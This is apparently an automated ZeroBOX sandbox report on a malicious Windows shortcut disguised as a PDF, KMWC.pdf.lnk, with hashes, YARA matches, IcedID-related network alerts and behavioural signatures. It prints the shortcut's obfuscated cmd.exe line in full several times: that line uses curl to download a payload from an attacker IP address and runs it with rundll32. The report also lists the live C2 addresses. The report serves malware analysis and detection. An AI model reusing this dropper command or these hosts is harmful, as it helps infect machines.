Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 27, 2023, 10:52 a.m.	Sept. 27, 2023, 10:54 a.m.

Size	2.1KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Wed Oct 6 04:51:36 2021, mtime=Tue Sep 26 02:14:49 2023, atime=Wed Oct 6 04:51:36 2021, length=289792, window=hidenormalshowminimized
MD5	`878ac1ae23f72d11af4239c8d86f3f65`
SHA256	`0b708fb7781d7585ffdac52ca595a05abe4cd69b13899800ab2754d6ce40535b`
CRC32	`0BAE6753`
ssdeep	`24:8aq2WJCnBc2LA8vd+/zlHS9lExlxIavi8532lKraimlR:8aq0i0MgHEjxqUrvm`
Yara	Lnk_Format_Zero - LNK Format lnk_file_format - Microsoft Windows Shortcut File Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "IALlcyCOe" C:\Users\test22\AppData\Local\Temp\KMWC.pdf.lnk
2552
- cmd.exe "C:\Windows\System32\cmd.exe" /c 0x || ECHo 0x & PI"NG" 0x || C"url" htt"p:"//"1"35."1"25."1"77.9"5"/"sy"K"/OC" -o C:\Users\test22\AppData\Local\Temp\0x.log & PI"NG" -n 3 0x || rundll32 C:\Users\test22\AppData\Local\Temp\0x.log scab /k besogon728 & e"x"It '=sZVLMKeNQ
  2664
  - PING.EXE PI"NG" 0x
    2756
  - curl.exe C"url" htt"p:"//"1"35."1"25."1"77.9"5"/"sy"K"/OC" -o C:\Users\test22\AppData\Local\Temp\0x.log
    2816
  - PING.EXE PI"NG" -n 3 0x
    2888
  - rundll32.exe rundll32 C:\Users\test22\AppData\Local\Temp\0x.log scab /k besogon728
    2960
    - rundll32.exe rundll32 C:\Users\test22\AppData\Local\Temp\0x.log scab /k besogon728
      3004

Name	Response	Post-Analysis Lookup
skrgerona.com	A 104.21.57.237 A 172.67.193.129	172.67.193.129

IP Address	Status	Action
104.21.57.237	Active	Moloch
135.125.177.95	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49171 -> 104.21.57.237:80	2032086	ET MALWARE Win32/IcedID Request Cookie	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 135.125.177.95:80	2013028	ET POLICY curl User-Agent Outbound	Attempted Information Leak
TCP 192.168.56.101:49166 -> 135.125.177.95:80	2034567	ET HUNTING curl User-Agent to Dotted Quad	Potentially Bad Traffic
TCP 135.125.177.95:80 -> 192.168.56.101:49166	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 135.125.177.95:80 -> 192.168.56.101:49166	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 27, 2023, 10:52 a.m.			0	0

Command line console output was observed (5 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 27, 2023, 10:52 a.m.	buffer: '0x' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 27, 2023, 10:52 a.m.	buffer: 0x console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:52 a.m.	buffer: 'e"x"It' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleA Sept. 27, 2023, 10:52 a.m.	buffer: Ping request could not find host 0x. Please check the name and try again. console_handle: 0x00000007	1	1
WriteConsoleA Sept. 27, 2023, 10:52 a.m.	buffer: Ping request could not find host 0x. Please check the name and try again. console_handle: 0x00000007	1	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	Connection to IP address				suspicious_request	GET http://135.125.177.95/syK/OC
suspicious_features	GET method with no useragent header				suspicious_request	GET http://skrgerona.com/

Performs some HTTP requests (2 events)

request	GET http://135.125.177.95/syK/OC
request	GET http://skrgerona.com/

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 27, 2023, 10:52 a.m.	process_identifier: 3004 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\KMWC.pdf.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /c 0x || ECHo 0x & PI"NG" 0x || C"url" htt"p:"//"1"35."1"25."1"77.9"5"/"sy"K"/OC" -o C:\Users\test22\AppData\Local\Temp\0x.log & PI"NG" -n 3 0x || rundll32 C:\Users\test22\AppData\Local\Temp\0x.log scab /k besogon728 & e"x"It '=sZVLMKeNQ

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (1 event)

host

135.125.177.95

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2552 resumed a thread in remote process 2664
NtResumeThread Sept. 27, 2023, 10:52 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2664	1	0	0

KMWC.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All